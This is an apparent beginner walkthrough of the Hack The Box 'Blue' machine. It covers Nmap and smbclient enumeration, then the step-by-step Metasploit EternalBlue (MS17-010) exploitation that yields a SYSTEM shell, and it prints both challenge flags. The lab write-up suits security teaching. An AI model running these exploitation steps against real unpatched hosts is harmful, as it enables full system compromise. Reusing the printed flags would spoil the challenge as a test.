Blue, one of the most beginner-friendly machines on Hack The Box, offers a critical lesson about the dangers of unpatched vulnerabilities. This machine focuses on the infamous EternalBlue exploit (MS17–010), which was leaked publicly and exploited in major ransomware and crypto-mining campaigns such as WannaCry and NotPetya. While simple in execution, Blue highlights how devastating vulnerabilities can be if left unaddressed.
This guide provides an in-depth walkthrough of the Blue challenge, aimed at beginners who are eager to sharpen their penetration testing skills while gaining a practical understanding of EternalBlue.
Why Blue Matters
Despite being classified as an “easy” machine, Blue delivers significant insights into:
- The dangers of unpatched systems in a production environment.
- Real-world exploitation of a publicly known vulnerability.
- The importance of timely patching and proactive vulnerability management.
By completing this challenge, you’ll gain:
1. Practical skills in identifying and exploiting vulnerable Windows SMB services.
2. A deeper appreciation for cybersecurity best practices.
What You’ll Learn
By working through this machine, you’ll develop:
- The ability to identify vulnerable Windows SMB services using enumeration techniques.
- Experience in exploiting EternalBlue through automated tools like Metasploit or a manual Python exploit.
- An understanding of how proper patch management can prevent large-scale cyberattacks.
Prerequisites
To successfully complete this challenge, you’ll need:
- Basic Knowledge: Familiarity with Windows systems, port scanning, and network enumeration.
- Tools Installed: Tools like Nmap, Metasploit, and Python on your attack machine.
- A Working Network Connection: Ensure you can reach the target over the Hack The Box VPN.
Check Network Connectivity
Before scanning, confirm connectivity to the target using the ping command:
The ping command sends ICMP (Internet Control Message Protocol) Echo Request packets to a specified host and waits for Echo Reply packets to confirm that the host is reachable. It’s one of the simplest and most commonly used tools for troubleshooting network connectivity.
ping -c4 <Target_IP>
ping -c4 10.10.10.40
ping: This is the command itself, used to test connectivity by sending packets to the target.
-c4: This option specifies the number of ICMP packets to send. In this case, 4 packets will be sent.
Without this flag, ping would continue sending packets indefinitely until stopped manually (with Ctrl+C).
<Target_IP>: Replace this placeholder with the actual IP address or hostname of the target machine.
If the target is reachable, you’ll see responses. If it’s unreachable, ensure your VPN is properly configured.
Task 1: How Many Open TCP Ports Are Listening on Blue?
Your first task is to determine the number of open TCP ports on the Blue machine. Avoid counting any 5-digit ports (ports greater than 9999).
Scanning the Target with Nmap
To identify open ports and services, run the following nmap command:
nmap -sC -sV -p- <Target_IP>
nmap -sC -sV -p- 10.10.10.40
-sC (Default Script Scan): This option tells Nmap to run a predefined set of scripts from the Nmap Scripting Engine (NSE). These scripts are designed to gather additional information about the target, such as:
Checking for vulnerabilities.
Retrieving software versions.
Performing brute force login attempts (if enabled).
-sV (Service Version Detection): This enables service version detection to determine which application and version is running on each open port.
This is essential for identifying potential vulnerabilities in outdated software versions.
-p- (Scan All Ports): By default, Nmap scans the most common 1,000 ports unless otherwise specified. The -p- option tells Nmap to scan all 65,535 TCP ports, from port 1 to port 65535.
This is useful because some services might run on non-standard ports, especially in custom or hardened configurations.
<Target_IP>: This tells Nmap the target of the scan.
Replace <Target_IP> with the IP address of the machine you want to scan (10.10.10.40).
Key Findings from the Nmap Scan
1. Host Status: Host is up. The target machine is online and reachable, with a latency of 0.13 seconds.
2. Open TCP Ports: A total of 9 open ports were detected:
135/tcp: Microsoft Windows RPC.
139/tcp: NetBIOS session service.
445/tcp: Microsoft Directory Services (SMB).
49152–49157/tcp: MSRPC (Microsoft Remote Procedure Call) dynamic ports.
3. Service Information: The target is running Windows 7 Professional SP1.
The NetBIOS computer name is HARIS-PC, and it belongs to the WORKGROUP workgroup.
4. Host Script Results:
SMB OS Discovery: The operating system is accurately identified as Windows 7 Professional SP1.
The system time indicates the host is set to 2024-12-06T10:52:33+00:00.
SMB Security Mode: Authentication level: User.
Message signing: Disabled (default but considered insecure).
SMB2 Security Mode: Message signing is enabled but not required.
Clock Skew: The clock skew between your machine and the target is approximately 1 second, which is negligible.
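As an added example (not part of the original walkthrough), the following Python script parses nmap's normal output, counts open TCP ports while skipping 5-digit ports as Task 1 requires, and flags the SMB signing weaknesses reported in the host script results. The embedded scan output is constructed to match the findings above, not a captured scan.

```python
import re

# Constructed sample, modeled on nmap's normal output for the Blue scan;
# it is not the walkthrough's own captured output.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.40
Host is up (0.13s latency).
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Host script results:
| smb-security-mode:
|   authentication_level: user
|   message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
"""

# One nmap port line: "<port>/<proto>  open  <service> ..."
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)", re.MULTILINE)


def open_ports(nmap_text):
    """Return (port, proto, service) tuples for every port nmap reports as open."""
    return [(int(p), proto, svc) for p, proto, svc in PORT_LINE.findall(nmap_text)]


def count_ports(nmap_text, max_port=9999):
    """Count open TCP ports, skipping 5-digit ports as the task requires."""
    return sum(1 for p, proto, _ in open_ports(nmap_text) if proto == "tcp" and p <= max_port)


def smb_signing_findings(nmap_text):
    """Flag signing settings that leave SMB sessions open to tampering; both show up on Blue."""
    findings = []
    if re.search(r"message_signing:\s*disabled", nmap_text):
        findings.append("SMB1 message signing disabled")
    if "Message signing enabled but not required" in nmap_text:
        findings.append("SMB2 message signing not required")
    return findings
```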
Analysis of Open Ports
The open ports suggest that this machine is configured as a standard Windows 7 system with some additional services enabled:
1. Critical Ports for Exploitation:
445/tcp: This is the SMB (Server Message Block) port, which is the primary target for the EternalBlue (MS17–010) exploit.
139/tcp: Often used alongside SMB for older NetBIOS protocols, but modern attacks usually focus on port 445.
2. Dynamic MSRPC Ports (49152–49157):
These are dynamically allocated ports for Microsoft Remote Procedure Call services.
While these may not be directly exploitable, they indicate the presence of RPC services, which can be probed further if necessary.
What This Means for Your Task
How Many TCP Ports are Listening?
From the output, we can see 9 open ports, but if we exclude 5-digit ports (ports 49152 through 49157), there are 3 remaining open ports:
135
139
445
Answer: 3 TCP ports (excluding 5-digit ports).
Task 2: What is the hostname of Blue?
From the Nmap scan results, the hostname of the target machine (Blue) is revealed in the SMB OS Discovery section.
Answer: HARIS-PC
Task 3: What operating system is running on the target machine? Give a two-word answer with a name and high-level version.
Answer: Windows 7
Task 4: How many SMB shares are available on Blue?
SMB Shares are networked resources shared using the Server Message Block (SMB) protocol. SMB is a file-sharing protocol commonly used on Windows networks to allow users and applications to access files, directories, printers, and other resources over a network as if they were local to their computer.
To determine how many SMB shares are available on the Blue machine, you can use tools like smbclient or Nmap with the appropriate scripts.
nmap --script smb-enum-shares -p 445 <Target_IP>
nmap --script smb-enum-shares -p 445 10.10.10.40
--script smb-enum-shares: This specifies that Nmap should run the SMB share enumeration script (smb-enum-shares) from its Nmap Scripting Engine (NSE).
The script connects to the SMB service on the target machine and attempts to enumerate all available shares.
Shares can include both:
Default shares: ADMIN$, C$, IPC$.
Custom shares: public or user-created shares.
-p 445: This limits the scan to port 445, the default port for the SMB service on modern Windows systems.
<Target_IP>: Replace <Target_IP> with the IP address of the target machine to specify which system Nmap should scan.
From the Nmap results, we can see the SMB shares available on the target machine (Blue) along with their access levels. Here’s a breakdown:
Identified SMB Shares
1. ADMIN$:
Type: Hidden administrative share.
Comment: Remote Admin.
Access: No access for anonymous or current user.
2. C$:
Type: Hidden administrative share.
Comment: Default share.
Access: No access for anonymous or current user.
3. IPC$:
Type: Hidden inter-process communication share.
Comment: Remote IPC.
Access:
Anonymous: Read access.
Current user: Read/Write access.
4. Share:
Type: Standard shared directory.
Comment: (No comment provided).
Access:
Anonymous: No access.
Current user: Read access.
5. Users:
Type: Standard shared directory.
Comment: (No comment provided).
Access:
Anonymous: No access.
Current user: Read access.
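As an added example (not the page's own code), this Python parser reads smb-enum-shares NSE output into a per-share table and lists the shares reachable without credentials, which is the first thing an SMB share audit should flag. The embedded output is constructed to match the five shares above, not a captured scan.

```python
import re

# Constructed sample, modeled on the smb-enum-shares script's output for Blue;
# it is not the walkthrough's own captured output.
SAMPLE_SHARE_OUTPUT = r"""
| smb-enum-shares:
|   \\10.10.10.40\ADMIN$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.40\C$:
|     Type: STYPE_DISKTREE_HIDDEN
|     Anonymous access: <none>
|     Current user access: <none>
|   \\10.10.10.40\IPC$:
|     Type: STYPE_IPC_HIDDEN
|     Anonymous access: READ
|     Current user access: READ/WRITE
|   \\10.10.10.40\Share:
|     Type: STYPE_DISKTREE
|     Anonymous access: <none>
|     Current user access: READ
|   \\10.10.10.40\Users:
|     Type: STYPE_DISKTREE
|     Anonymous access: <none>
|_    Current user access: READ
"""

# "|   \\<host>\<share>:" opens a share block; "|     Field: value" lines follow it.
SHARE_HEADER = re.compile(r"^\|[_ ]\s+\\\\[^\\]+\\(\S+):\s*$")
FIELD = re.compile(r"^\|[_ ]\s+([A-Za-z ]+):\s*(.*)$")


def parse_shares(text):
    """Map each share name to its fields (Type, Anonymous access, Current user access)."""
    shares, current = {}, None
    for line in text.splitlines():
        m = SHARE_HEADER.match(line)
        if m:
            current = m.group(1)
            shares[current] = {}
            continue
        m = FIELD.match(line)
        if m and current is not None:
            shares[current][m.group(1).strip()] = m.group(2).strip()
    return shares


def anonymous_accessible(shares):
    """Shares the scanner could reach with no credentials: the audit findings to review first."""
    return [n for n, f in shares.items() if f.get("Anonymous access", "<none>") != "<none>"]
```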
Alternatively, use the smbclient tool to list shares:
smbclient is a command-line tool that allows users to interact with SMB (Server Message Block)/CIFS (Common Internet File System) servers. It is essentially the Unix/Linux equivalent of a Windows file-sharing client. With smbclient, you can access shared files and directories on remote servers that use the SMB protocol.
smbclient -L //<Target_IP> -N
smbclient -L //10.10.10.40 -N
smbclient: smbclient is a command-line tool for interacting with SMB/CIFS shares on remote servers.
It can be used to list shares, connect to them, upload/download files, and more.
-L: The -L option tells smbclient to list the available shares on the specified target machine.
It queries the server for all shared resources that the user (in this case, anonymous) has permission to see.
//<Target_IP>: Replace <Target_IP> with the IP address or hostname of the target machine you want to scan for SMB shares.
-N: The -N option specifies that no password should be used for authentication.
This effectively attempts an anonymous login, which is common in misconfigured or poorly secured SMB setups.
Answer: 5 SMB shares listed:
- ADMIN$
- C$
- IPC$
- Share
- Users
Task 5: What 2017 Microsoft Security Bulletin number describes a remote code execution vulnerability in SMB?
To find the 2017 Microsoft Security Bulletin that describes a remote code execution vulnerability in SMB, use an Internet search.
Answer: MS17–010
Vulnerability: MS17–010 is the security bulletin addressing vulnerabilities in the Server Message Block (SMB) protocol, specifically in SMBv1.
Exploit Name: This vulnerability is commonly associated with the exploit known as EternalBlue.
Impact: It allows remote code execution (RCE), enabling an attacker to execute arbitrary code on a vulnerable machine.
Affected Systems:
Windows Vista
Windows 7
Windows 8.1
Windows Server 2008/2012/2016
Older unsupported systems like Windows XP.
Significance
Exploited by Malware: The vulnerability was widely exploited by ransomware such as WannaCry and NotPetya.
These attacks caused massive global disruptions by encrypting files and demanding payment.
Patch Release: Microsoft released a patch for this vulnerability in March 2017 to address the issue. Systems that were not updated remained vulnerable.
For additional details, refer to the official Microsoft Security Bulletin:
MS17–010: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Task 6: Optional question: A worm was set loose on the internet in May 2017 propagating primarily through MS17–010. What is the famous name for that malware?
To find the malware that propagated through MS17-010 in May 2017, use an Internet search such as:
MS17-010 malware May 2017
The famous malware that propagated primarily through the MS17–010 vulnerability in May 2017 is:
1. Name: WannaCry (also styled as WannaCrypt, WannaCryptor, or Wana Decrypt0r).
2. Type: Ransomware.
3. Method of Propagation: Exploited the EternalBlue exploit, which targeted the SMBv1 protocol vulnerability (MS17–010).
Spread as a worm, allowing it to propagate automatically across vulnerable systems within a network.
4. Impact: It encrypted files on infected machines and demanded payment in Bitcoin to decrypt them.
Caused global disruptions, affecting organizations like hospitals, businesses, and government agencies.
Significance
WannaCry was one of the most devastating ransomware attacks ever, infecting hundreds of thousands of systems across over 150 countries in just a few days.
It highlighted the importance of timely system patching, as a fix for MS17–010 had been released two months before the attack.
Additional Notes
Tool Used: WannaCry leveraged the EternalBlue exploit, which was part of a set of hacking tools leaked from the NSA by a group called the Shadow Brokers.
Prevention: Systems patched with the update for MS17–010 were immune to the attack.
Answer: WannaCry
Task 7: What user do you get execution with when exploiting MS17–010? Include the full name, including anything before a \.
To find the user context you gain when exploiting MS17-010, use a tool like Metasploit or a manual script (a Python-based EternalBlue exploit) to exploit the target system.
Using Metasploit:
1. Launch Metasploit:
msfconsole -q
2. Search for ms17_010
search ms17_010
3. Load the EternalBlue module:
use exploit/windows/smb/ms17_010_eternalblue
4. Set the target IP and your local IP:
set RHOSTS <Target_IP>
set LHOST <Your_Attack_Machine_IP>
set RHOSTS 10.10.10.40
set LHOST 10.10.14.7
5. Run the exploit:
run
Once you gain a Meterpreter session, use the getuid command (Meterpreter's equivalent of whoami) to show the current user:
getuid
Answer: NT AUTHORITY\SYSTEM
NT AUTHORITY\SYSTEM: This is the highest privilege account on a Windows system, often referred to as the “system account.”
It has more privileges than an administrator and is used by the operating system to execute processes.
The EternalBlue exploit allows for remote code execution (RCE) in the context of the SMB service.
Since the SMB service runs under the NT AUTHORITY\SYSTEM account, the exploit inherits these privileges.
Submit the flag located on the haris user’s desktop.
1. Open a Windows command shell via Meterpreter:
shell
2. List Users on the System
dir C:\Users
3. Change to the user haris Desktop directory:
cd C:\Users\haris\Desktop
4. List the contents of the Desktop directory:
dir
5. Read the user.txt file:
type user.txt
Flag: 0c4f3a9386dba985686ce78e58237c6d
Submit the flag located on the administrator’s desktop.
1. Change to the administrator user's Desktop directory:
cd C:\Users\administrator\Desktop
2. List the contents of the Desktop directory:
dir
3. Read the root.txt file:
type root.txt
Flag: b6b9cccdf6904e9ffdb0110122a50a43
Lessons Learned
Completing the Blue (MS17-010) Hack The Box challenge provides key insights and practical skills related to cybersecurity and system exploitation:
1. Importance of Patching
Keeping systems up-to-date with critical patches is essential to prevent exploitation of known vulnerabilities. The infamous WannaCry ransomware attack demonstrated the catastrophic consequences of unpatched systems.
2. SMB Risks
SMB misconfigurations and vulnerabilities (e.g., SMBv1) are common attack vectors. Disabling legacy protocols and regularly auditing SMB shares are crucial steps to secure systems.
3. Hands-On Skills
Tools like Metasploit, Nmap, and SMBClient are invaluable for enumeration and exploitation. Practical experience with these tools improves the understanding of how attackers operate.
4. Privilege Escalation
Exploiting MS17–010 grants high-level privileges (NT AUTHORITY\SYSTEM), emphasizing the need for layered security and privilege monitoring.
5. Enumeration is Critical
Proper reconnaissance (e.g., identifying SMB shares and open ports) is foundational to successful exploitation and understanding system weaknesses.
6. Real-World Relevance
The EternalBlue exploit shows how real-world vulnerabilities and leaks (Shadow Brokers’ NSA toolkit) can lead to large-scale attacks like WannaCry and NotPetya.
7. System Hardening
Secure configurations, disabling SMBv1, and enforcing strong access controls reduce the attack surface significantly.
8. Incident Response
Understanding vulnerabilities like EternalBlue provides valuable insights into detecting, preventing, and responding to attacks effectively.
Skills Gained
Enumeration: Identifying weak points using tools like Nmap and smbclient.
Exploitation: Understanding how EternalBlue works and using it to gain access.
Privilege Escalation: Working with elevated privileges.
Post-Exploitation: Extracting sensitive information and understanding the impact.
Final Takeaway
Blue may be a beginner-level challenge, but it emphasizes the real-world implications of unpatched systems and misconfigurations. It provides practical experience and highlights the importance of proactive security measures, making it a valuable learning experience for both offensive and defensive cybersecurity professionals.